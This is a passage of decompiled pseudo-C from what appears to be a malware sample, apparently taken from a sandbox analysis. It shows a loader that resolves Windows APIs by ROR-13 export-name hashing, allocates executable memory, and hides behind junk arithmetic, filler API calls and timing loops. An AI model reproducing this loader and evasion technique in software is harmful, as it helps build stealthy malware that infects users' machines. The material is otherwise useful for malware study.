						asm("movss xmm0, [0x6e4f9718]");
						asm("movss [ebp-0x158], xmm0");
						asm("movss xmm0, [0x6e4f9784]");
						_v244 = _v296;
						asm("movss [ebp-0x15c], xmm0");
						asm("movss xmm0, [0x6e4f9578]");
						_v160 = _v92;
						asm("movss [ebp-0x160], xmm0");
						asm("movss xmm0, [0x6e4f9710]");
						_v152 = _v76;
						_v100 = _v312;
						asm("movss [ebp-0x114], xmm0");
						while(_t843 != 0) {
							while(1) {
								_v104 = _t580;
								if(_t580 == 0) {
									break;
								}
								if(_t814 + 4 <= _v60) {
									asm("comiss xmm1, xmm2");
									if(__eflags < 0) {
										asm("pause");
										_t640 = E6E4E8E30(E6E4B5D90(), _t639);
										asm("movaps xmm1, xmm0");
										asm("xorps xmm2, xmm2");
										asm("mulsd xmm0, [ebp-0x150]");
										asm("mulsd xmm1, [ebp-0xd4]");
										asm("divsd xmm1, xmm0");
										asm("movss xmm0, [ebp-0xf4]");
										asm("cvtsd2ss xmm2, xmm1");
										asm("comiss xmm0, xmm2");
										asm("movss [ebp-0x1c], xmm2");
										asm("movss [ebp-0x24], xmm2");
										if(__eflags < 0) {
											goto L33;
										}
										goto L32;
									} else {
										GetCommandLineW();
										L32:
										_t661 = E6E4B5EE0(0x21, _t814);
										asm("cdq");
										_t640 = E6E4E8E30(E6E4E8160(_t661, _t814, 0x2c, 0), _t663);
										asm("xorps xmm2, xmm2");
										asm("cvtsd2ss xmm2, xmm0");
										asm("movss [ebp-0x1c], xmm2");
										asm("movss [ebp-0x24], xmm2");
										L33:
										asm("ucomiss xmm2, [ebp-0xcc]");
										asm("lahf");
										__eflags = _t640 & 0x00000044;
										if(__eflags == 0) {
											EmptyClipboard();
											asm("movss xmm2, [ebp-0xa4]");
											asm("movss [ebp-0x1c], xmm2");
											asm("movss [ebp-0x24], xmm2");
										}
										goto L35;
									}
								} else {
									_t814 = 0xd;
									_t665 = E6E4B8A10(_t868, 0xd, _t904);
									asm("movss xmm2, [ebp-0x1c]");
									_t868 = _t665;
									L35:
									_t802 =  *_t904;
									if(_t802 < 0x61) {
										_t838 = _v44;
										__eflags = _t838 - _v156;
										_t642 =  !=  ? _t838 : _v112;
										_v8 = 0xffffffff;
										_t814 =  !=  ? _t838 : _v112;
										_v44 = _t814;
										L39:
										_t868 = _t868 + (_t802 & 0x000000ff);
										if(_t814 == _v60) {
											asm("comiss xmm2, [ebp-0x120]");
											if(__eflags >= 0) {
												asm("movss xmm0, [ebp-0x5c]");
												E6E4B5C20(_t802, _t814);
												asm("cvttss2si esi, xmm0");
												asm("movss xmm0, [ebp-0x5c]");
												E6E4B5C20(_t802, _t814);
												asm("movd xmm1, esi");
												asm("cvtdq2ps xmm1, xmm1");
												asm("cvttss2si ecx, xmm0");
												asm("movss [ebp-0x30], xmm0");
												asm("movss [ebp-0x1c], xmm1");
												E6E4B5EE0(_t802, _t814);
												asm("movss xmm1, [ebp-0x30]");
												asm("movss xmm2, [ebp-0x1c]");
												_t904 = _v72;
												asm("movd xmm0, eax");
												asm("cvtdq2ps xmm0, xmm0");
												_t814 = _v44;
												asm("divss xmm1, xmm0");
												asm("subss xmm2, xmm1");
												asm("movss [ebp-0x1c], xmm2");
												asm("movss [ebp-0x24], xmm2");
											}
											asm("movss xmm1, [ebp-0x80]");
											_t580 = _v104 + 0xffff;
										} else {
											_t904 = _t904 + 1;
											asm("movss xmm1, [ebp-0x80]");
											_t580 = _v104 + 0xffff;
											_v72 = _t904;
										}
										continue;
									}
									asm("cdq");
									_t651 = _v44 - _t814 >> 1;
									if(_v44 - _t814 >> 1 < _v60) {
										asm("movss xmm1, [0x6e4f96f4]");
										asm("movsd xmm3, [0x6e4f95b8]");
										asm("movss xmm0, [0x6e4f9734]");
										asm("movss [ebp-0x4c], xmm1");
										asm("movsd xmm1, [0x6e4f9628]");
										asm("movsd [ebp-0x90], xmm1");
										asm("movss xmm1, [0x6e4f9764]");
										asm("movss [ebp-0x84], xmm1");
										asm("movss xmm1, [0x6e4f9564]");
										asm("movsd [ebp-0xc0], xmm3");
										asm("movss [ebp-0x80], xmm0");
										asm("movss [ebp-0x108], xmm1");
										while(1) {
											_t873 = 0;
											__eflags = 0;
											asm("movsd [ebp-0xac], xmm3");
											asm("comiss xmm0, xmm2");
											_t910 = 0x32;
											if(0 < 0) {
												goto L48;
											}
											_t839 = 0;
											_t806 = 0x32;
											E6E4E8E30(_t651, 0x32);
											asm("movsd xmm1, [ebp-0xac]");
											asm("movaps xmm2, xmm0");
											asm("movsd [ebp-0x150], xmm2");
											do {
												asm("cvtpd2ps xmm0, xmm1");
												_t654 = E6E4B5C20(_t806, _t839);
												_t839 = _t873;
												asm("movss [ebp-0x64], xmm0");
												_t655 = E6E4E8E30(_t654, _t910);
												asm("movss xmm2, [ebp-0x64]");
												asm("cvtsd2ss xmm0, xmm0");
												asm("movaps xmm1, xmm2");
												asm("subss xmm1, xmm0");
												asm("cvtps2pd xmm0, xmm2");
												asm("movss [ebp-0x30], xmm1");
												asm("movsd xmm1, [ebp-0xac]");
												asm("addsd xmm1, [ebp-0x150]");
												asm("divsd xmm0, xmm1");
												asm("movsd [ebp-0xac], xmm1");
												_t656 = E6E4E8CDF(_t655);
												_t910 = _t656;
												_t806 = _t656;
												E6E4E8E30(_t656, _t656);
												asm("movsd xmm1, [ebp-0xac]");
												asm("movaps xmm2, xmm0");
												asm("movss xmm0, [ebp-0x30]");
												asm("addss xmm0, [ebp-0x64]");
												asm("movsd [ebp-0x150], xmm2");
												asm("cvtps2pd xmm0, xmm0");
												asm("addsd xmm0, xmm1");
												asm("addsd xmm0, xmm2");
												asm("movss xmm2, [ebp-0x80]");
												asm("cvtpd2ps xmm0, xmm0");
												asm("comiss xmm2, xmm0");
											} while (__eflags >= 0);
											L48:
											asm("movss xmm0, [0x6e4f9730]");
											asm("movss [ebp-0x64], xmm0");
											do {
												__imp__GetCurrentProcessorNumber();
												asm("movss xmm0, [ebp-0x64]");
												_t652 = E6E4B5C20(_t802, _t814);
												asm("movss xmm1, [ebp-0x4c]");
												asm("cvtss2sd xmm0, xmm0");
												asm("cvtsd2ss xmm0, xmm0");
												asm("comiss xmm1, xmm0");
												asm("movss [ebp-0x64], xmm0");
											} while (__eflags > 0);
											asm("movss xmm2, [ebp-0xcc]");
											asm("movsd xmm1, [ebp-0x90]");
											asm("ucomiss xmm0, xmm2");
											asm("lahf");
											__eflags = _t652 & 0x00000044;
											if(__eflags != 0) {
												L52:
												asm("comiss xmm0, [ebp-0x84]");
												if(__eflags <= 0) {
													asm("movss xmm0, [0x6e4f9788]");
													_t651 = E6E4B5C20(_t802, _t814);
													asm("movss xmm2, [ebp-0x110]");
													asm("subss xmm2, xmm0");
												} else {
													_t802 = 1;
													_t659 = E6E4B5D90();
													asm("movss xmm2, [ebp-0x108]");
													_t651 = _t659;
													asm("movd xmm0, eax");
													asm("cvtdq2ps xmm0, xmm0");
													asm("divss xmm2, xmm0");
													asm("subss xmm2, [0x6e4f97b4]");
												}
												asm("comiss xmm2, [ebp-0x5c]");
												asm("movss xmm0, [ebp-0x80]");
												asm("movsd xmm3, [ebp-0xc0]");
												if(__eflags > 0) {
													asm("movss xmm0, [ebp-0xc8]");
													_t658 = E6E4B5C20(_t802, _t814);
													asm("cvttss2si eax, xmm0");
													asm("movsd xmm3, [ebp-0xc0]");
													_t651 = _t658 * 0xffffffe8;
													asm("movd xmm0, eax");
													asm("cvtdq2pd xmm0, xmm0");
													asm("cvtpd2ps xmm2, xmm0");
													asm("movss xmm0, [ebp-0x80]");
												}
												continue;
											} else {
												goto L51;
											}
											do {
												L51:
												asm("movaps xmm0, xmm1");
												asm("mulsd xmm1, xmm0");
												asm("xorps xmm0, xmm0");
												asm("cvtsd2ss xmm0, xmm1");
												asm("ucomiss xmm0, xmm2");
												asm("lahf");
												__eflags = _t652 & 0x00000044;
											} while (__eflags != 0);
											goto L52;
										}
									} else {
										_t814 = _v44;
										_t868 = _t868 + 0xffffffe0;
										goto L39;
									}
								}
							}
							_t905 = _v60;
							__eflags = _t868 - 0x6a4abc5b;
							if(_t868 != 0x6a4abc5b) {
								L112:
								__eflags = _v236;
								if(__eflags == 0) {
									L126:
									_t843 =  *_v68;
									_v68 = _t843;
									continue;
								}
								__eflags = _v200;
								if(__eflags == 0) {
									goto L126;
								}
								__eflags = _v128;
								if(__eflags == 0) {
									goto L126;
								}
								__eflags = _t814 - _t905;
								if(__eflags > 0) {
									_t814 = 0x91afca54;
									E6E4B8A50(0x91afca54);
									_t772 =  *((intOrPtr*)(_v36 + 0x50)) + 0xc;
									__eflags = _t772;
									_t582 = VirtualAlloc(0, _t772, 0x3000, 0x40); // executed
									_v48 = _t582;
									break;
								}
								asm("movss xmm0, [ebp-0x1c]");
								asm("o16 nop [eax+eax]");
								L117:
								asm("comiss xmm0, [0x6e4f9798]");
								if(__eflags > 0) {
									_t580 = E6E4E8E30(_t580, 0x32);
									asm("cvtsd2ss xmm0, xmm0");
								}
								goto L117;
							}
							__eflags = _t814 - _t905;
							if(_t814 <= _t905) {
								__eflags = _v120;
								if(_v120 <= 0) {
									goto L112;
								}
								_t583 = _v160;
								_t774 = _v152;
								_t906 = _v48;
								while(1) {
									L63:
									_v92 = _t583;
									_t870 = _t774;
									_v76 = _t870;
									_t775 =  *_t583 + _t906;
									_t907 = 0;
									__eflags = 0;
									_t585 =  *_t775;
									do {
										L64:
										asm("ror esi, 0xd");
										_t775 = _t775 + 1;
										_t907 = _t907 + _t585;
										_t585 =  *_t775;
										__eflags = _t585;
									} while (_t585 != 0);
									_v52 = _t907;
									__eflags = _t907 - 0xec0e4e8e;
									if(_t907 == 0xec0e4e8e) {
										L68:
										_t776 = _v60;
										_t871 = _t814;
										__eflags = _t814 - _t776;
										if(_t814 <= _t776) {
											L84:
											_t872 = _v48;
											_t777 = _v100;
											L85:
											__eflags = _t907 - 0xec0e4e8e;
											if(_t907 != 0xec0e4e8e) {
												__eflags = _t907 - 0x7c0dfcaa;
												if(_t907 != 0x7c0dfcaa) {
													__eflags = _t907 - 0x91afca54;
													if(_t907 == 0x91afca54) {
														__eflags = _t814 - _v60;
														if(_t814 > _v60) {
															_t589 =  *_t777 + _t872;
															__eflags = _t589;
															_v128 = _t589;
															_v284 = _t589;
														}
													}
													L109:
													_t194 =  &_v120;
													 *_t194 = _v120 + 0xffff;
													__eflags =  *_t194;
													_t814 = _v44;
													_t870 = _v76;
													L110:
													__eflags = _t814 - _v288;
													_t774 =  <=  ? _t870 :  &(_t870[1]);
													_v152 = _t774;
													_t583 =  <=  ? _v92 : _v92 + 4;
													__eflags = _v120;
													_t906 = _v48;
													if(_v120 > 0) {
														asm("movss xmm2, [ebp-0x1c]");
														L63:
														_v92 = _t583;
														_t870 = _t774;
														_v76 = _t870;
														_t775 =  *_t583 + _t906;
														_t907 = 0;
														__eflags = 0;
														_t585 =  *_t775;
														goto L64;
													}
													_t905 = _v60;
													_v160 = _t583;
													_v92 = _t583;
													_v152 = _t774;
													_v76 = _t774;
													goto L112;
												}
												asm("cdq");
												_t592 = _t814 - _t814 >> 1;
												__eflags = _t592 - _v60;
												if(__eflags < 0) {
													asm("comiss xmm2, [ebp-0x100]");
													asm("movsd xmm1, [ebp-0xc0]");
													asm("movsd [ebp-0x34], xmm1");
													if(__eflags < 0) {
														L95:
														asm("movss xmm0, [ebp-0xc8]");
														asm("comiss xmm0, xmm2");
														if(__eflags >= 0) {
															GetSystemDefaultLangID();
															asm("movss xmm0, [ebp-0x18]");
															E6E4B5C20(_t777, _t814);
															asm("xorps xmm1, xmm1");
															asm("cvtss2sd xmm1, xmm0");
															asm("movsd [ebp-0x34], xmm1");
															_t608 = E6E4E8E30(E6E4B5D90(), _t607);
															asm("movsd [ebp-0x50], xmm0");
															_t609 = E6E4E8CDF(_t608);
															_push(_t814);
															_push(_t609);
															E6E4B5A30();
															asm("movsd xmm1, [ebp-0x34]");
															_t914 = _t914 + 8;
															asm("divsd xmm1, [ebp-0x50]");
															_t814 = 0;
															_t777 = 0xc4;
															asm("cvttsd2si eax, xmm0");
															asm("movd xmm0, eax");
															asm("cvtdq2pd xmm0, xmm0");
															asm("divsd xmm1, xmm0");
															asm("movsd [ebp-0x34], xmm1");
															_t592 = E6E4E8E30(_t609, 0xc4);
															asm("movsd xmm1, [ebp-0x34]");
															asm("addsd xmm1, xmm0");
															asm("cvtpd2ps xmm2, xmm1");
														}
														asm("ucomiss xmm2, [ebp-0xa0]");
														asm("lahf");
														__eflags = _t592 & 0x00000044;
														if((_t592 & 0x00000044) == 0) {
															asm("movss xmm0, [ebp-0x140]");
															E6E4B5C20(_t777, _t814);
															asm("cvtss2sd xmm0, xmm0");
															asm("movsd [ebp-0x50], xmm0");
															asm("mulsd xmm0, [ebp-0x168]");
															asm("cvttsd2si esi, xmm0");
															E6E4E8E30(E6E4B5EE0(0x71, _t814), _t603);
															asm("cvtsd2ss xmm0, xmm0");
															asm("movss [ebp-0x30], xmm0");
															asm("movss xmm0, [ebp-0x144]");
															_t592 = E6E4B5C20(_t603, _t814);
															asm("movsd xmm1, [ebp-0x50]");
															asm("cvttss2si eax, xmm0");
															asm("xorps xmm0, xmm0");
															asm("cvtsi2sd xmm0, esi");
															asm("divsd xmm1, xmm0");
															asm("movss xmm0, [ebp-0x30]");
															asm("cvtps2pd xmm0, xmm0");
															asm("divsd xmm1, xmm0");
															asm("xorps xmm0, xmm0");
															asm("cvtsi2sd xmm0, eax");
															asm("addsd xmm1, xmm0");
															asm("cvtpd2ps xmm2, xmm1");
														}
														asm("ucomiss xmm2, [ebp-0xfc]");
														asm("movsd xmm3, [ebp-0xb4]");
														asm("lahf");
														__eflags = _t592 & 0x00000044;
														if(__eflags != 0) {
															L101:
															asm("movss xmm0, [ebp-0x154]");
															asm("comiss xmm0, xmm2");
															if(__eflags < 0) {
																E6E4E8E30(E6E4B5D90(), _t593);
																asm("xorps xmm1, xmm1");
																asm("cvtsd2ss xmm1, xmm0");
																asm("movss xmm0, [ebp-0x158]");
																asm("divss xmm0, xmm1");
																asm("movss [ebp-0x1c], xmm1");
																asm("movss [ebp-0x30], xmm0");
																_t595 = E6E4B5D90();
																asm("movss xmm0, [ebp-0x15c]");
																asm("divss xmm0, [ebp-0x30]");
																_t596 = _t595;
																asm("movss xmm1, [ebp-0x1c]");
																asm("subss xmm1, xmm0");
																asm("movd xmm0, eax");
																asm("cvtdq2ps xmm0, xmm0");
																asm("addss xmm1, xmm0");
															} else {
																_t601 = E6E4B5EE0(0x33, _t814);
																asm("movss xmm1, [ebp-0x54]");
																_t596 = _t601;
																asm("movd xmm0, eax");
																asm("cvtdq2ps xmm0, xmm0");
																asm("divss xmm1, xmm0");
																asm("addss xmm1, [ebp-0x110]");
															}
															asm("ucomiss xmm1, [ebp-0x160]");
															asm("movss [ebp-0x24], xmm1");
															asm("movss [ebp-0x1c], xmm1");
															asm("lahf");
															__eflags = _t596 & 0x00000044;
															if((_t596 & 0x00000044) == 0) {
																E6E4E8E30(_t596, 0x12);
																asm("cvtsd2ss xmm0, xmm0");
																asm("addss xmm0, [ebp-0x114]");
																asm("movss [ebp-0x4c], xmm0");
																_v52 = E6E4B5EE0(0x47, 0);
																E6E4E8E30(E6E4B5EE0(_t598, 0), _t599);
																asm("movd xmm1, dword [ebp-0x30]");
																asm("cvtdq2ps xmm1, xmm1");
																asm("cvtsd2ss xmm0, xmm0");
																asm("addss xmm1, [ebp-0x4c]");
																asm("addss xmm1, xmm0");
																asm("movss [ebp-0x1c], xmm1");
																asm("movss [ebp-0x24], xmm1");
															}
															goto L109;
														} else {
															do {
																asm("movaps xmm0, xmm3");
																_t592 = E6E4E8CDF(_t592);
																_push(_t814);
																_push(_t592);
																E6E4B5A30();
																asm("movaps xmm3, xmm0");
																asm("xorps xmm2, xmm2");
																asm("mulsd xmm0, xmm3");
																asm("movaps xmm1, xmm3");
																_t914 = _t914 + 8;
																asm("cvttsd2si eax, xmm0");
																asm("movd xmm0, eax");
																asm("cvtdq2pd xmm0, xmm0");
																asm("subsd xmm1, xmm0");
																asm("cvtsd2ss xmm2, xmm1");
																asm("ucomiss xmm2, [ebp-0xfc]");
																asm("lahf");
																__eflags = _t592 & 0x00000044;
															} while (__eflags != 0);
															goto L101;
														}
													}
													asm("movss xmm0, [ebp-0x104]");
													asm("movss [ebp-0x64], xmm0");
													asm("movsd xmm0, [ebp-0x188]");
													asm("movsd [ebp-0x50], xmm0");
													do {
														EmptyClipboard();
														asm("movss xmm0, [ebp-0x64]");
														E6E4B5C20(_t777, _t814);
														asm("cvttsd2si ecx, [ebp-0x34]");
														asm("movss [ebp-0x9c], xmm0");
														asm("movsd xmm0, [ebp-0x34]");
														asm("addsd xmm0, [ebp-0x50]");
														asm("cvttsd2si esi, xmm0");
														_t777 = E6E4B5D90();
														E6E4E8E30(_t612, _t612);
														asm("movsd [ebp-0x34], xmm0");
														asm("movss xmm0, [ebp-0x9c]");
														_t592 = E6E4B5C20(_t612, _t814);
														asm("movd xmm1, esi");
														asm("cvttss2si eax, xmm0");
														asm("movss xmm0, [ebp-0x9c]");
														asm("cvtdq2ps xmm1, xmm1");
														asm("movd xmm2, eax");
														asm("subss xmm0, xmm1");
														asm("movss [ebp-0x64], xmm1");
														asm("cvtdq2pd xmm2, xmm2");
														asm("cvtps2pd xmm0, xmm0");
														asm("movsd [ebp-0x50], xmm2");
														asm("addsd xmm0, [ebp-0x34]");
														asm("addsd xmm0, xmm2");
														asm("cvtpd2ps xmm2, xmm0");
														asm("comiss xmm2, [ebp-0x100]");
													} while (__eflags >= 0);
													goto L95;
												}
												_t615 =  *_t777 + _t872;
												_v200 = _t615;
												_v320 = _t615;
												goto L109;
											}
											__eflags = _t814 - _v60;
											if(_t814 > _v60) {
												_t617 =  *_t777 + _t872;
												_v236 = _t617;
												_v316 = _t617;
											}
											goto L109;
										}
										_t618 = _t814 + _t814;
										_v136 = _t618;
										while(1) {
											_v80 = _t871;
											__eflags = _t618 - _t776;
											if(_t618 >= _t776) {
												break;
											}
											asm("ucomiss xmm2, [ebp-0x104]");
											asm("lahf");
											__eflags = _t618 & 0x00000044;
											if(__eflags == 0) {
												_t632 = TlsAlloc();
												_t814 = 0;
												__eflags = 0;
												E6E4E8E30(_t632, 0x126);
												asm("cvtsd2ss xmm0, xmm0");
												asm("cvttss2si ecx, xmm0");
												E6E4B5D90();
											}
											asm("movss xmm1, [ebp-0x128]");
											do {
												asm("movd xmm0, eax");
												_t623 = 1;
												asm("cvtdq2ps xmm0, xmm0");
												asm("divss xmm1, xmm0");
												asm("comiss xmm1, [ebp-0x12c]");
											} while (__eflags >= 0);
											asm("ucomiss xmm1, [ebp-0xf4]");
											asm("lahf");
											__eflags = 0;
											if(0 != 0) {
												E6E4E8E30(E6E4B5EE0(4, _t814), _t624);
												asm("movsd [ebp-0x68], xmm0");
												asm("cvtsd2ss xmm0, xmm0");
												_t626 = E6E4B5C20(_t624, _t814);
												asm("cvttss2si eax, xmm0");
												asm("movsd xmm0, [ebp-0x180]");
												_t623 = _t626;
												asm("movd xmm1, eax");
												asm("cvtdq2pd xmm1, xmm1");
												asm("mulsd xmm1, [ebp-0x68]");
												asm("subsd xmm0, xmm1");
											} else {
												asm("movsd xmm0, [ebp-0xd4]");
												asm("divsd xmm0, xmm0");
											}
											asm("cvtpd2ps xmm2, xmm0");
											asm("movss xmm0, [ebp-0x130]");
											asm("ucomiss xmm2, [ebp-0x78]");
											asm("movss [ebp-0x44], xmm0");
											asm("movss xmm0, [ebp-0xf8]");
											asm("lahf");
											asm("movss [ebp-0x24], xmm2");
											asm("movss [ebp-0x1c], xmm2");
											asm("movss [ebp-0x64], xmm0");
											__eflags = _t623 & 0x00000044;
											if((_t623 & 0x00000044) != 0) {
												L82:
												_t871 = _t871 + 1;
												__eflags = _v80 - _v112;
												_t618 = _v136;
												_t776 = _v60;
												if(_v80 >= _v112) {
													continue;
												}
												_t814 = _v44;
												goto L84;
											} else {
												_t909 = __imp__CoFreeUnusedLibraries;
												do {
													_t628 =  *_t909();
													asm("movss xmm0, [ebp-0x64]");
													asm("divss xmm0, [ebp-0x44]");
													E6E4E8E30(E6E4E8AFE(_t628), _t629);
													asm("movss xmm1, [ebp-0x44]");
													asm("cvtsd2ss xmm0, xmm0");
													asm("addss xmm1, xmm0");
													asm("movss [ebp-0x1c], xmm0");
													asm("movaps xmm0, xmm1");
													asm("movss [ebp-0x44], xmm1");
													_t631 = E6E4B5C20(_t629, _t814);
													asm("movss xmm2, [ebp-0x1c]");
													asm("subss xmm2, [ebp-0x44]");
													asm("movss [ebp-0x64], xmm0");
													asm("addss xmm2, xmm0");
													asm("ucomiss xmm2, [ebp-0x78]");
													asm("movss [ebp-0x1c], xmm2");
													asm("movss [ebp-0x24], xmm2");
													asm("lahf");
													__eflags = _t631 & 0x00000044;
												} while ((_t631 & 0x00000044) != 0);
												_t907 = _v52;
												goto L82;
											}
										}
										_t872 = _v48;
										_t814 = _v44;
										_t777 =  *((intOrPtr*)(_v244 + 0x1c)) + ( *_v152 & 0x0000ffff) * 4 + _t872;
										_v100 = _t777;
										_v312 = _t777;
										goto L85;
									}
									__eflags = _t907 - 0x7c0dfcaa;
									if(_t907 == 0x7c0dfcaa) {
										goto L68;
									}
									__eflags = _t907 - 0x91afca54;
									if(_t907 != 0x91afca54) {
										goto L110;
									}
									goto L68;
								}
							}
							_v120 = 3;
							_t906 =  *(_v68 + 0x10);
							_v48 = _t906;
							_v240 = _t906;
							_t797 =  *((intOrPtr*)( *((intOrPtr*)(_t906 + 0x3c)) + _t906 + 0x78));
							_t798 = _t797 + _t906;
							_v244 = _t798;
							_t583 =  *((intOrPtr*)(_t797 + _t906 + 0x20)) + _t906;
							_v296 = _t798;
							_t774 =  *((intOrPtr*)(_t798 + 0x24)) + _t906;
							_v152 = _t774;
							goto L63;
						}
						_t879 = 1;
						do {
							__imp__GetTickCount64();
							asm("movsd xmm1, [ebp-0x178]");
							_t879 = _t879 + 1;
							__eflags = _t879;
							asm("movd xmm0, esi");
							asm("cvtdq2pd xmm0, xmm0");
							asm("comisd xmm1, xmm0");
						} while (_t879 >= 0);
						asm("movsd xmm0, [0x6e4f97c0]");
						asm("movsd [ebp-0x90], xmm0");
						asm("movsd xmm0, [0x6e4f9648]");
						asm("movsd [ebp-0xb4], xmm0");
						asm("movss xmm0, [ebp-0x1c]");
						while(1) {
							_t691 = _v44;
							asm("movss xmm1, [0x6e4f977c]");
							asm("cdq");
							_t815 = _v60;
							_t453 = _t691 - _t814 >> 1;
							_v52 = _t453;
							__eflags = _t453 - _t815;
							if(__eflags >= 0) {
								break;
							}
							asm("comiss xmm1, xmm0");
							if(__eflags < 0) {
								_t559 = E6E4E8E30(AreFileApisANSI(), 0x64);
								asm("cvtsd2ss xmm0, xmm0");
								asm("divss xmm0, [ebp-0x78]");
								_t560 = E6E4E8AFE(_t559);
								_t562 = E6E4E8E30(E6E4B5D90(), _t561);
								asm("movsd [ebp-0xe4], xmm0");
								_t563 = E6E4E8E30(_t562, _t560);
								asm("movss xmm1, [ebp-0x78]");
								asm("cvtsd2ss xmm0, xmm0");
								asm("divss xmm1, xmm0");
								asm("movaps xmm0, xmm1");
								_t565 = E6E4E8E30(E6E4E8AFE(_t563), _t564);
								asm("movsd xmm2, [ebp-0xe4]");
								asm("movaps xmm1, xmm0");
								asm("movaps xmm0, xmm2");
								_t814 = 0;
								asm("divsd xmm0, xmm1");
								asm("mulsd xmm2, xmm1");
								asm("cvtpd2ps xmm0, xmm0");
								asm("cvtps2pd xmm0, xmm0");
								asm("mulsd xmm0, xmm2");
								asm("movsd [ebp-0xe4], xmm0");
								E6E4E8E30(_t565, _t560);
								asm("movsd xmm1, [ebp-0xe4]");
								asm("addsd xmm1, xmm0");
								asm("cvtpd2ps xmm0, xmm1");
							} else {
								_t568 = E6E4E8E30(TlsAlloc(), 0x48);
								asm("divsd xmm0, [ebp-0x90]");
								_t569 = E6E4E8CDF(_t568);
								asm("sbb eax, edx");
								_t814 = 0;
								E6E4E8E30(0, 0xc8 - _t569);
								asm("movsd [ebp-0xe4], xmm0");
								E6E4E8E30(E6E4B5D90(), _t572);
								asm("movsd xmm1, [ebp-0xe4]");
								asm("subsd xmm1, xmm0");
								asm("subsd xmm1, [ebp-0xb4]");
								asm("cvtpd2ps xmm0, xmm1");
							}
						}
						_t844 = _v188;
						asm("movss [ebp-0x1c], xmm0");
						_t455 =  *((intOrPtr*)(_t844 + 0x3c)) + _t844;
						_v96 = _t455;
						_t880 =  *(_t455 + 0x54);
						_t456 = _v48;
						_v36 = _t456;
						__eflags = _t880;
						if(_t880 == 0) {
							L132:
							asm("movsd xmm0, [0x6e4f96c0]");
							_t881 = 1;
							asm("movsd [ebp-0x10c], xmm0");
							do {
								__imp__GetTickCount64();
								asm("movsd xmm1, [ebp-0x10c]");
								_t881 = _t881 + 1;
								__eflags = _t881;
								asm("movd xmm0, esi");
								asm("cvtdq2pd xmm0, xmm0");
								asm("comisd xmm1, xmm0");
							} while (_t881 >= 0);
							_t882 = __imp__GetThreadErrorMode;
							asm("movss xmm1, [0x6e4f9758]");
							asm("movss xmm0, [ebp-0x1c]");
							_t845 = _v52;
							while(1) {
								L135:
								asm("movss xmm2, [0x6e4f9740]");
								while(1) {
									__eflags = _t845 - _v60;
									if(_t845 >= _v60) {
										break;
									}
									asm("ucomiss xmm0, xmm1");
									asm("movss [ebp-0x7c], xmm2");
									asm("lahf");
									__eflags = _t456 & 0x00000044;
									if((_t456 & 0x00000044) != 0) {
										continue;
									} else {
										goto L138;
									}
									do {
										L138:
										 *_t882();
										asm("movss xmm0, [ebp-0x7c]");
										_t557 = E6E4B5C20(_t691, _t815);
										asm("movss xmm2, [ebp-0x7c]");
										asm("movaps xmm1, xmm0");
										asm("divss xmm2, xmm2");
										asm("mulss xmm1, xmm0");
										asm("movss [ebp-0x7c], xmm2");
										asm("cvttss2si eax, xmm1");
										_t456 = _t557;
										asm("movd xmm1, eax");
										asm("cvtdq2ps xmm1, xmm1");
										asm("mulss xmm1, xmm2");
										asm("subss xmm0, xmm1");
										asm("movss xmm1, [0x6e4f9758]");
										asm("ucomiss xmm0, xmm1");
										asm("movss [ebp-0x1c], xmm0");
										asm("lahf");
										__eflags = _t456 & 0x00000044;
									} while ((_t456 & 0x00000044) != 0);
									goto L135;
								}
								__imp__GetTickCount64();
								__imp__GetTickCount64();
								_v80 = _t456;
								_v52 = _t815;
								E6E4E8DF0(E6E4E81A0(_t456, _t815, 0x2710, 0), _t457, _t815);
								asm("mulsd xmm0, [ebp-0x170]");
								asm("movsd [ebp-0x88], xmm0");
								E6E4E8DF0(E6E4E81A0(_v80, _v52, 0x2710, 0), _t459, _t815);
								asm("mulsd xmm0, [ebp-0xdc]");
								_t461 = _v96;
								asm("movsd xmm1, [ebp-0x88]");
								asm("addsd xmm1, xmm0");
								_t848 = ( *(_t461 + 0x14) & 0x0000ffff) + _t461;
								_t462 =  *(_t461 + 6) & 0x0000ffff;
								asm("mulsd xmm1, [ebp-0xac]");
								asm("divsd xmm1, [0x6e4f9590]");
								asm("movsd [ebp-0x88], xmm1");
								__eflags = _t462;
								if(_t462 == 0) {
									L154:
									asm("movsd xmm0, [0x6e4f9570]");
									_t884 = 1;
									asm("movsd [ebp-0x50], xmm0");
									asm("movsd [ebp-0x34], xmm0");
									asm("movsd xmm0, [0x6e4f9568]");
									asm("movsd [ebp-0xdc], xmm0");
									asm("movsd xmm0, [0x6e4f9550]");
									asm("movsd [ebp-0x90], xmm0");
									do {
										__imp__GetTickCount64();
										asm("movsd xmm0, [ebp-0x34]");
										asm("subsd xmm0, [ebp-0xdc]");
										asm("mulsd xmm0, [ebp-0xac]");
										asm("addsd xmm0, [ebp-0x170]");
										asm("movsd [ebp-0x34], xmm0");
										_t462 = E6E4E8DF0(E6E4E81A0(_t462, _t815, 0x2710, 0), _t463, _t815);
										asm("movsd xmm1, [ebp-0x34]");
										_t884 = _t884 + 1;
										__eflags = _t884;
										asm("mulsd xmm1, xmm0");
										asm("movd xmm0, esi");
										asm("cvtdq2pd xmm0, xmm0");
										asm("mulsd xmm1, [ebp-0x90]");
										asm("movsd [ebp-0x34], xmm0");
										asm("addsd xmm1, [ebp-0x88]");
										asm("movsd [ebp-0x88], xmm1");
										asm("movsd xmm1, [ebp-0x178]");
										asm("comisd xmm1, xmm0");
									} while (_t884 >= 0);
									_t695 = _v44;
									_t464 = _t695 + 4;
									__eflags = _t464 - _v156;
									_t886 =  >  ? _t695 : _v112;
									_t697 = _v96 - 0xffffff80;
									_v44 = _t886;
									_v72 = _t697;
									_t850 =  *_t697 + _v48;
									_v8 = 0xffffffff;
									asm("movsd xmm0, [0x6e4f9688]");
									asm("movsd xmm1, [0x6e4f9608]");
									asm("movsd [ebp-0x168], xmm0");
									asm("movsd [ebp-0xdc], xmm1");
									while(1) {
										L157:
										asm("movss xmm1, [ebp-0x1c]");
										_v40 = _t850;
										while(1) {
											asm("movss xmm0, [0x6e4f96d0]");
											asm("movss xmm3, [0x6e4f96bc]");
											asm("movss xmm2, [0x6e4f9790]");
											while(1) {
												L159:
												__eflags =  *(_t850 + 0xc);
												if( *(_t850 + 0xc) == 0) {
													break;
												}
												__eflags =  *_t697;
												if( *_t697 == 0) {
													break;
												}
												_t858 = _v60;
												while(1) {
													__eflags = _t886 - _t858;
													if(__eflags != 0) {
														break;
													}
													asm("comiss xmm0, xmm1");
													_t739 = 0x69;
													_t819 = 0x4f;
													if(__eflags <= 0) {
														L167:
														asm("ucomiss xmm1, xmm2");
														asm("movss [ebp-0x20], xmm3");
														asm("lahf");
														__eflags = _t464 & 0x00000044;
														if(__eflags != 0) {
															L171:
